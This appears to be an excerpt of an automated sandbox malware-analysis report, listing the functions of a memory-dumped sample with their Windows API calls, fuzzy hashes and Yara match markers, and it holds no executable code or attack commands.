                                                            • Opcode Fuzzy Hash: 4d4d2abbed9b856c4e49574ec055b924c190fec3ea5a9e19aedb67fed442bc91
                                                            • Instruction Fuzzy Hash: E2B1A9B1A2020AEFDF18DFA4C9809AEBBB5FF44314F14405AEC156B221D375FA91CB91
                                                            APIs
                                                            • CreateCompatibleDC.GDI32(00000D62), ref: 04232AFB
                                                            • DeleteDC.GDI32(00000002), ref: 04232D68
                                                            • DeleteObject.GDI32(?), ref: 04232D71
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Delete$CompatibleCreateObject
                                                            • String ID:
                                                            • API String ID: 1022343127-0
                                                            • Opcode ID: e95f5015060c6103ea10429a1b77e37f05786f833e418949151545d05b0bc3b2
                                                            • Instruction ID: f72b6010ca6418d9a4d8b6573eda19c20bc23cdbc50cb89c34a0b689460f6117
                                                            • Opcode Fuzzy Hash: e95f5015060c6103ea10429a1b77e37f05786f833e418949151545d05b0bc3b2
                                                            • Instruction Fuzzy Hash: E28119F1B2021ADBDF208F949CC467E7A74EB09316F240996E514FA2A0D3B5A941C776
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9fe71bcdd1bbb702f49a54012c45d7b8d444f282691c212cc4cbc8a317458075
                                                            • Instruction ID: 42f45d9ff2df2ae2630b2cca227a301d741e6295ed752cd8bdae7c3c409bbdb9
                                                            • Opcode Fuzzy Hash: 9fe71bcdd1bbb702f49a54012c45d7b8d444f282691c212cc4cbc8a317458075
                                                            • Instruction Fuzzy Hash: EAB1B174B2024AEFEB15DF98C880BAD7BB5AF89314F044199D811972E1DBB0B942CF71
                                                            APIs
                                                            • __allrem.LIBCMT ref: 04245B59
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04245B75
                                                            • __allrem.LIBCMT ref: 04245B8C
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04245BAA
                                                            • __allrem.LIBCMT ref: 04245BC1
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04245BDF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                            • String ID:
                                                            • API String ID: 1992179935-0
                                                            • Opcode ID: 2e1f11e2f5fb8b6f5f5cb9471793ade9c397e797c40a1014ab29af20b239fdf2
                                                            • Instruction ID: f7f059ea2664b18e4d1f5a14941f2d2db3331a960ca24116e58620f8447931b7
                                                            • Opcode Fuzzy Hash: 2e1f11e2f5fb8b6f5f5cb9471793ade9c397e797c40a1014ab29af20b239fdf2
                                                            • Instruction Fuzzy Hash: 0881D571720716BBE728DF68CC80B6AB3E9EF85368F144529EA91D76D0E770F5808B50
                                                            APIs
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 04233124
                                                              • Part of subcall function 042310D3: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 042311AC
                                                              • Part of subcall function 0423297F: CreateCompatibleDC.GDI32(00000D62), ref: 04232AFB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateCompatibleCreateHeapInfoParametersSystem
                                                            • String ID: Ku^%$Ku^%
                                                            • API String ID: 392924372-1067927601
                                                            • Opcode ID: 5fba2874abc2024b8c6e5124d58d55933df8614bf4ced896e9a56da650471c50
                                                            • Instruction ID: 3f9b3089223e40ea1218340f892cf1b6eeb68b339ac9c3298c03be4944a1714b
                                                            • Opcode Fuzzy Hash: 5fba2874abc2024b8c6e5124d58d55933df8614bf4ced896e9a56da650471c50
                                                            • Instruction Fuzzy Hash: FAE12AF1F3051A87DB28CB988C4567EBA70AB05316F14492AF911FB2D0E775FB40C696
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,0424C460,0423D70D,0423D25E), ref: 0424C477
                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0424C485
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0424C49E
                                                            • SetLastError.KERNEL32(00000000,0424C460,0423D70D,0423D25E), ref: 0424C4F0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLastValue___vcrt_
                                                            • String ID:
                                                            • API String ID: 3852720340-0
                                                            • Opcode ID: 3af03ad12e9647128257a5912ac6000d76f7b2b06ff93b3a1d903c536e80f5b5
                                                            • Instruction ID: 455d045ab9a4b30a8e25b1eda121a92ebea67491ebaedb1f29d46c30e2f97906
                                                            • Opcode Fuzzy Hash: 3af03ad12e9647128257a5912ac6000d76f7b2b06ff93b3a1d903c536e80f5b5
                                                            • Instruction Fuzzy Hash: A501F03772F2136EB7381BBABD8557B2A94DF812757210239E934C50F4FFE168409195
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $^F
                                                            • API String ID: 0-2072159057
                                                            • Opcode ID: 7b640e70ded73f9c08873221f97cb98eab12bfdaea4e205fc4c25b8478a09ce9
                                                            • Instruction ID: eb8b207f4fb14703b69fbe22c04cf3df58f79e7934b9efc51d672082700f1db2
                                                            • Opcode Fuzzy Hash: 7b640e70ded73f9c08873221f97cb98eab12bfdaea4e205fc4c25b8478a09ce9
                                                            • Instruction Fuzzy Hash: D841F872720744AFE725DF78CC01B6ABBE9EB84754F10952AEC11DB2A0D675F9408B90
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c3608c6e5e2c178f7c1cfe104e837bc4478c8e9b3100bb118724dc105c523b5b
                                                            • Instruction ID: 6668b69cc38a9002ef77ea5517fe25ee5e8b6543d0d96f9c669f36f54bbb4c4c
                                                            • Opcode Fuzzy Hash: c3608c6e5e2c178f7c1cfe104e837bc4478c8e9b3100bb118724dc105c523b5b
                                                            • Instruction Fuzzy Hash: C351A335B20249AADB14DFE4D944ADEB7BCEF49710F10001AE815E7250FB74AA41CB69
                                                            APIs
                                                            • GetFileType.KERNEL32(04246E5E,?,00000000,?), ref: 04246F5B
                                                            • GetFileInformationByHandle.KERNEL32(04246E5E,?), ref: 04246FB5
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04246E5E,?,000000FF,00000000), ref: 04247043
                                                            • __dosmaperr.LIBCMT ref: 0424704A
                                                            • PeekNamedPipe.KERNEL32(04246E5E,00000000,00000000,00000000,?,00000000), ref: 04247087
                                                              • Part of subcall function 04246C00: __dosmaperr.LIBCMT ref: 04246C35
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                            • String ID:
                                                            • API String ID: 1206951868-0
                                                            • Opcode ID: a8d23b60b5c6af24eb5b294ccd2b8419e7252ea46638bc04f1f82efcf21124ef
                                                            • Instruction ID: 09eeeada74cc04b64556edd3ad1e1346bd59df93898500a94c47304486a4b127
                                                            • Opcode Fuzzy Hash: a8d23b60b5c6af24eb5b294ccd2b8419e7252ea46638bc04f1f82efcf21124ef
                                                            • Instruction Fuzzy Hash: D5416EB1A20205AFDB28DFB5DC449AFBBF9EFC8300B00542DE456D3610EB70A945CB20
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID: ,]{: }$fE$fE
                                                            • API String ID: 4218353326-1418347821
                                                            • Opcode ID: c472bb84d9ff05f3389f2633287c6e63b4c59ab839c65fc641c5baeda17e4bdc
                                                            • Instruction ID: de0ab9f8323e41b5b8b5c3c8132a646be69f5fbee85f8452d0b143f07ebc65bf
                                                            • Opcode Fuzzy Hash: c472bb84d9ff05f3389f2633287c6e63b4c59ab839c65fc641c5baeda17e4bdc
                                                            • Instruction Fuzzy Hash: 8051EE72B243464FE720BAA99C5072BA2C68FD5258F1AC5389E18C33D3FA71F8158612
                                                            APIs
                                                            • RtlEncodePointer.NTDLL(00000000), ref: 0425A050
                                                            • CatchIt.LIBVCRUNTIME ref: 0425A136
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CatchEncodePointer
                                                            • String ID: MOC$RCC
                                                            • API String ID: 1435073870-2084237596
                                                            • Opcode ID: f6539cf28fa7df93cb7a4fd0398e0aeb39c553d0f7c18ec6f96af6878300a19c
                                                            • Instruction ID: d693d6c6f6b2b10af7a96e28e55ac64d3ff8364d71a114aa64faaa67a40a7340
                                                            • Opcode Fuzzy Hash: f6539cf28fa7df93cb7a4fd0398e0aeb39c553d0f7c18ec6f96af6878300a19c
                                                            • Instruction Fuzzy Hash: FE416A72A1020AEFDF16DF98DD81AAEBBB5FF48304F198159F914A7220D335A950DB50
                                                            APIs
                                                            • GetConsoleOutputCP.KERNEL32(0046B080,0425578A,00000000,?), ref: 04250A14
                                                              • Part of subcall function 0425346A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,0425578A,0425578A,04243F62,04250768,0000FDE9,00000000,?,?,?,04251067,0000FDE9,00000000,?), ref: 04253516
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 04250C6F
                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04250CB7
                                                            • GetLastError.KERNEL32 ref: 04250D5A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                            • String ID:
                                                            • API String ID: 2112829910-0
                                                            • Opcode ID: f7a2fa6a9c7b7c2702c5415ca5342024ae727f2fb94ff8ae16218cd9c601ae44
                                                            • Instruction ID: 8d78bbdcbb79b4a373ba15d837c0b82dc75ee9c3627c1294a85bbc946d0cad98
                                                            • Opcode Fuzzy Hash: f7a2fa6a9c7b7c2702c5415ca5342024ae727f2fb94ff8ae16218cd9c601ae44
                                                            • Instruction Fuzzy Hash: F1D16975E106599FDF15CFE8C880AADBBB8FF49314F18852AE855EB361E730A841CB50
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 9a%^$M%
                                                            • API String ID: 0-1620995425
                                                            • Opcode ID: 8dd5fb1bb415952618eeb69f9c4c5347ce22eee3cd407679ffb4ef07d832097c
                                                            • Instruction ID: e9c5bc8052c5cb84dadaaaaf44502ca3d896b486ec1672cb0cc84ce7e75d080f
                                                            • Opcode Fuzzy Hash: 8dd5fb1bb415952618eeb69f9c4c5347ce22eee3cd407679ffb4ef07d832097c
                                                            • Instruction Fuzzy Hash: A29128F2F3060A8ADF24DB98C88117DB674EB54702F64461AE845EB390E7B4EB40CB57
                                                            APIs
                                                            • CreateDCW.GDI32(00462C52,00000000,00000000,00000000), ref: 042334EF
                                                            • GetSystemMetrics.USER32(00000001), ref: 0423362A
                                                            • GetSystemMetrics.USER32(00000000), ref: 04233685
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MetricsSystem$Create
                                                            • String ID:
                                                            • API String ID: 1087689917-0
                                                            • Opcode ID: 39e2f0d19a532311fcde3bb1b361131464c434098777e83cc3901b20fe1d0761
                                                            • Instruction ID: 23b6910e4b861957c3c9e2b4dcfbecdbdfb7bd6444268f6b27be7134c830c90c
                                                            • Opcode Fuzzy Hash: 39e2f0d19a532311fcde3bb1b361131464c434098777e83cc3901b20fe1d0761
                                                            • Instruction Fuzzy Hash: 485127F5F301069FDF21CB9C88455FD79B6AB49212F200523ED55EA320D2B4EB858B56
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AdjustPointer
                                                            • String ID:
                                                            • API String ID: 1740715915-0
                                                            • Opcode ID: e549594ee335f88c809106c5544a2f4baf43b5eb7b90bfa02ae88c691973c827
                                                            • Instruction ID: 87da42afbff1e0bd505ec52c3a9647bcae2aabf628580660ab39f66a3b4c41db
                                                            • Opcode Fuzzy Hash: e549594ee335f88c809106c5544a2f4baf43b5eb7b90bfa02ae88c691973c827
                                                            • Instruction Fuzzy Hash: 8551BFF2B25602EFEB298F14D840BAA77A8FF44311F144129EC05972A0E731F9C1CBA4
                                                            APIs
                                                            • FreeLibrary.KERNEL32(00000000,?,0424D289,000000FF,0046B0C0,04236A8C,00000000,04205C9A,?,0424D03D,00000021,00465044,0046503C,00465044,04236A8C), ref: 0424D23D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 6740c229368fb351fb4ec7fc524e13049988398a7c5dabcb7bff3fed9ad9b5d0
                                                            • Instruction ID: 7e256500541e2da20d3db0b1a33ecb2cfa09e0ad959316e3d5f19ddb0f69e89c
                                                            • Opcode Fuzzy Hash: 6740c229368fb351fb4ec7fc524e13049988398a7c5dabcb7bff3fed9ad9b5d0
                                                            • Instruction Fuzzy Hash: D221D831F71211A7EB26DFA0EC80B5A3768DBC1764B140220ED15A7691FBB0FD00C6E5
                                                            APIs
                                                            • SetFilePointerEx.KERNEL32(?,00000000,00000000,04248448,00000001,?,04248448,042037CF,?,00000000), ref: 042511BE
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,042037CF,00000000), ref: 042511CB
                                                            • SetFilePointerEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,042037CF,00000000), ref: 042511F1
                                                            • SetFilePointerEx.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04251217
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FilePointer$ErrorLast
                                                            • String ID:
                                                            • API String ID: 142388799-0
                                                            • Opcode ID: cfe5fe78128bb7dd68b840a0eb5d6fe201827b23293f70a06ce6f48395b8db59
                                                            • Instruction ID: 89d2d33358c66a2f7aeb5e6c53a277b47975dfd1e2444048716a6543108b24db
                                                            • Opcode Fuzzy Hash: cfe5fe78128bb7dd68b840a0eb5d6fe201827b23293f70a06ce6f48395b8db59
                                                            • Instruction Fuzzy Hash: 60115E75A1012ABBDF109F55EC48AAE3F7DEF04364F008554FC24D61A0D771EA50DBA0
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,?,?,00000000,04255F06,00000000,?,0425B683,04255F06,04246E9E,?,00000000,00000104,?,00000001,00000000), ref: 04256023
                                                            • GetLastError.KERNEL32(?,0425B683,04255F06,04246E9E,?,00000000,00000104,?,00000001,00000000,00000000,?,04255F06,?,00000104,04246E9E), ref: 0425602D
                                                            • __dosmaperr.LIBCMT ref: 04256034
                                                            • GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,0425B683,04255F06,04246E9E,?,00000000,00000104,?,00000001,00000000,00000000), ref: 0425605E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FullNamePath$ErrorLast__dosmaperr
                                                            • String ID:
                                                            • API String ID: 1391015842-0
                                                            • Opcode ID: c7c4edbd7a7b70f3d07427bfb556099335345e9fdb19da3b7b6c0357393f98ce
                                                            • Instruction ID: b5339189711b03238beef4cacf71feb987463fc7d01fb881f7264fd36c93f304
                                                            • Opcode Fuzzy Hash: c7c4edbd7a7b70f3d07427bfb556099335345e9fdb19da3b7b6c0357393f98ce
                                                            • Instruction Fuzzy Hash: 39F04436310211AFEB305F62DC08E577BADFF443607108429E95AC6570EBB1F811DB64
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,?,?,00000000,04255F06,00000000,?,0425B60B,04255F06,04255F06,04246E9E,?,00000000,00000104,?,00000001), ref: 04256089
                                                            • GetLastError.KERNEL32(?,0425B60B,04255F06,04255F06,04246E9E,?,00000000,00000104,?,00000001,00000000,00000000,?,04255F06,?,00000104), ref: 04256093
                                                            • __dosmaperr.LIBCMT ref: 0425609A
                                                            • GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,0425B60B,04255F06,04255F06,04246E9E,?,00000000,00000104,?,00000001,00000000), ref: 042560C4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FullNamePath$ErrorLast__dosmaperr
                                                            • String ID:
                                                            • API String ID: 1391015842-0
                                                            • Opcode ID: a72e1de69e8ac08235e0b59f4006df7dc26bf1db3731920fcb84235d1ad79fd5
                                                            • Instruction ID: 6638d3532a263319108ea2b2befbd25980d095cae3f7428a32b615aadb17d9e9
                                                            • Opcode Fuzzy Hash: a72e1de69e8ac08235e0b59f4006df7dc26bf1db3731920fcb84235d1ad79fd5
                                                            • Instruction Fuzzy Hash: 7EF03136310611AFEB245F62DC04A5BBBAEFF452607108829E959C2530EBB2F811DB64
                                                            APIs
                                                            • WriteConsoleW.KERNEL32(00000000,0425578A,00000000,00000000,00000000,?,0425A1D1,00000000,00000001,00000000,?,?,04250DAE,?,0425578A,00000000), ref: 0425BF86
                                                            • GetLastError.KERNEL32(?,0425A1D1,00000000,00000001,00000000,?,?,04250DAE,?,0425578A,00000000,?,?,?,042506F9,04243F62), ref: 0425BF92
                                                              • Part of subcall function 0425BFE3: CloseHandle.KERNEL32(0046BAC0,0425BFA2,?,0425A1D1,00000000,00000001,00000000,?,?,04250DAE,?,0425578A,00000000,?,?), ref: 0425BFF3
                                                            • ___initconout.LIBCMT ref: 0425BFA2
                                                              • Part of subcall function 0425BFC4: CreateFileW.KERNEL32(00468068,40000000,00000003,00000000,00000003,00000000,00000000,0425BF60,0425A1BE,?,?,04250DAE,?,0425578A,00000000,?), ref: 0425BFD7
                                                            • WriteConsoleW.KERNEL32(00000000,0425578A,00000000,00000000,?,0425A1D1,00000000,00000001,00000000,?,?,04250DAE,?,0425578A,00000000,?), ref: 0425BFB7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                            • String ID:
                                                            • API String ID: 2744216297-0
                                                            • Opcode ID: c2a2ecc1c2a42e22a3f830c2b4be3aaf5d7a6f5fb3480db1df2f59ef4a2b949f
                                                            • Instruction ID: c40c1826a6c558e8c5c3fcff180bcbfccdb2ddcc4f5fb1beb9d1b203cdccfe50
                                                            • Opcode Fuzzy Hash: c2a2ecc1c2a42e22a3f830c2b4be3aaf5d7a6f5fb3480db1df2f59ef4a2b949f
                                                            • Instruction Fuzzy Hash: 18F01C36210129BBDF221FD5DC08AD93F2AFF492A1F144020FE19D5130D7B2E8609F95
                                                            APIs
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0423DA16
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 0423DACA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CurrentImageNonwritable___except_validate_context_record
                                                            • String ID: csm
                                                            • API String ID: 3480331319-1018135373
                                                            • Opcode ID: 4e5ede0b4027151e909a7cfdd177c32462acfec368dfe8ef4ee5f082c53f6a08
                                                            • Instruction ID: 934b8d627fc562f218a34aa265eea464401a82f7db28a6ac60520fddf8ad3e63
                                                            • Opcode Fuzzy Hash: 4e5ede0b4027151e909a7cfdd177c32462acfec368dfe8ef4ee5f082c53f6a08
                                                            • Instruction Fuzzy Hash: 3541E174B3420AABCF10DF69C880A9EBFB5EF85319F148195E8149B391E771BA05CB91
                                                            APIs
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 04259B0D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ___except_validate_context_record
                                                            • String ID: csm$csm
                                                            • API String ID: 3493665558-3733052814
                                                            • Opcode ID: bd77938e174d17ab149a6bce2b14a2ddc10501c9168853feaa912111e58622ef
                                                            • Instruction ID: 3af92b996dfafc5219f4ecf2262d8eea95e4e38bf140de5512c3dae658f92a3d
                                                            • Opcode Fuzzy Hash: bd77938e174d17ab149a6bce2b14a2ddc10501c9168853feaa912111e58622ef
                                                            • Instruction Fuzzy Hash: ED319EB2620219DBEF26CF50C944A6E7B6AFF08315F18455AFC544A130D333E8E1DB81